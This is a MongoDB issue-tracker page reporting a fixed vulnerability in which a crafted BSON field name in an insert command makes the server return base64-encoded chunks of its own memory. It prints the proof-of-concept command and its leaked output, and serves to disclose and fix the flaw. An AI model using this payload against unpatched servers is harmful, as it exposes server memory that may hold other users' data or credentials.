Uploaded image for project: 'Core Server'
  1. Core Server
  2. SERVER-7769

use --objcheck by default, Server arbitrary memory reading

    XMLWordPrintable

Details

    • Bug
    • Status: Closed
    • Major - P3
    • Resolution: Fixed
    • None
    • 2.3.2
    • None
    • None
    • ALL

    Description

      The specialists of the Positive Research center have detected "Server arbitrary memory reading" vulnerability in MongoDB application.

      Cause of incorrect execution of BSON-document length in column name in the insert command it’s possible to insert a record which can contain a base64-encrypted server memory chunks.

      Example of use:

      Suppose you have a table "dropme" with write permission.

      Execute the following command with a result:

      > db.dropme.insert(

      {"\x16\x00\x00\x00\x05hello\x00\x010\x00\x00\x00world\x00\x00" : "world"}

      )
      > db.dropme.find()

      { "_id" : ObjectId("50857a4663944834b98eb4cc"), "" : null, "hello" : BinData(0,"d29ybGQAAAAACREAAAAQ/4wJSCCPCeyFjQkRAAAAAAAAAAAAWbcQAAAAMQAAAAEAAABgcicICAAAAAcAAACgKo0JABw5NAMAAAAAAAAAAAAAAMQ3jAlmAGkAQQAAAEIAaQBuAEQAYQB0AGEAKAAxADEAOQAsACIAYgAzAEoAcwBaAEEAQQBBAEEAQQBBAD0AIgApAAAAdABSAFEAAAAiAGgAZQBsAGwAbwAiACAAOgAgAEIAaQBuAEQAYQB0AGEAKAAxADEAOQAsAC...........................ACkALAAgACIAFg==") }

      After base64-code decryption you can get bytes from random server memory chunks.

      Credits

      The vulnerability was discovered by Mikhail Firstov, Positive Research Center (Positive Technologies Company)

      Attachments

        Issue Links

          Activity

            People

              eliot Eliot Horowitz (Inactive)
              ymaryshev Yury
              Votes:
              1 Vote for this issue
              Watchers:
              12 Start watching this issue

              Dates

                Created:
                Updated:
                Resolved: